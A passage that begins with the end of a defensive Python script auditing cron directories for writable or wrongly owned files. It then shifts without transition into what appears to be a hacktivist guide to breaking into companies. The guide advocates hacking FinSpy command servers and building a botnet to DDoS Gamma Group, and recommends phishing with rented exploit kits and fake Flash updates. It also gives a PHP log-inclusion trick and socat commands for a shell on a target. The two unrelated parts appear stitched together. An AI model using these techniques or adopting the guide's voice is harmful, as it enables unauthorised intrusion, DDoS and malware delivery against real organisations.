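        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                findings.append((path, "symlink; its target may be controlled by another user"))
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_uid != expected_uid:
                findings.append((path, f"owned by uid {st.st_uid}, not {expected_uid}"))
            if st.st_mode & stat.S_IWOTH:
                findings.append((path, "world-writable"))
            elif st.st_mode & stat.S_IWGRP:
                findings.append((path, "group-writable"))
    return findings

def remediation(findings, expected_uid=0):
    """Shell commands that would correct each finding (returned, not executed)."""
    owner = "root:root" if expected_uid == 0 else f"{expected_uid}:{expected_uid}"
    cmds = []
    for path, problem in findings:
        if problem.startswith("symlink"):
            cmds.append(f"# inspect and replace symlink {path}")
        else:
            cmds.append(f"chown {owner} {path}")
            cmds.append(f"chmod go-w {path}")
    return list(dict.fromkeys(cmds))  # de-duplicate, keep order

def demo():
    """Build a constructed cron.hourly in a temp dir and audit it against the current user."""
    root = tempfile.mkdtemp(prefix="cron-audit-")
    cron = os.path.join(root, "cron.hourly")
    os.mkdir(cron, 0o755)
    # Constructed scripts: one correct, one group-writable, one world-writable.
    for name, mode in (("webalizer", 0o775), ("logrotate", 0o755), ("mgmtlicensestatus", 0o777)):
        path = os.path.join(cron, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return [(os.path.basename(p), problem)
            for p, problem in audit_cron_dirs([cron], expected_uid=os.getuid())]

if __name__ == "__main__":
    dirs = sys.argv[1:] or CRON_DIRS
    found = audit_cron_dirs(dirs)
    for path, problem in found:
        print(f"WARNING: {path}: {problem}")
    for cmd in remediation(found):
        print(cmd)
    sys.exit(1 if found else 0)
```

Run it as root with no arguments to audit the live system, or pass directories explicitly. Note that a cron job that is itself read-only can still be subverted if it sources or executes another file the www-data account owns, so the scripts' contents deserve a look too.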

–[ 6 ]– Pivoting
The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.
The only interesting thing I could get on finsupport’s local network was another
webserver serving up a folder called ‘qateam’ containing their mobile malware.

–[ 7 ]– Have Fun
Once you’re in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there’s no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make do with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.

Point your GPUs at and crack the password
already so I can move on to step 2! (Torrent)

–[ 8 ]– Other Methods
The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There’s no one right way, and any method that works is as good as
any other. The other main ways that I’ll state without going into detail are:
1) Exploits in web browsers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.

This is the method used by most of the government hacking groups, but you don’t
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality Russian exploit kit
for a couple thousand, and rent access to one for much less. There’s also
metasploit browser autopwn, but you’ll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.

The infosec industry invented a term to make this sound like some sort of
science: “Social Engineering”. This is probably the way to go if you don’t know
too much about computers, and it really is all it takes to be a successful
hacker [0].


–[ 9 ]– Resources

(all his other blog posts are great too) (start at Exploit writing tutorial part 1)
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.

Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.

The Web Application Hacker’s Handbook (PDF/13.5MB)
Hacking: The Art of Exploitation (PDF/4MB)
The Database Hacker’s Handbook (PDF/2MB)
The Art of Software Security Assessment (PDF/12.6MB)
A Bug Hunter’s Diary (PDF/5.15MB)
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier (PDF/1.2MB)
TCP/IP Illustrated – Vol. 1 (PDF/40.2MB) Vol. 2 (PDF/37.9MB) Vol. 3 (PDF/40MB)
Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.

–[ 10 ]– Outro
You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
customers are targeting and with what purpose that makes them evil. That’s not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it’s cheaper to attack than to defend it’s harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!

Related Link: Recommendations for the Hacktivist Community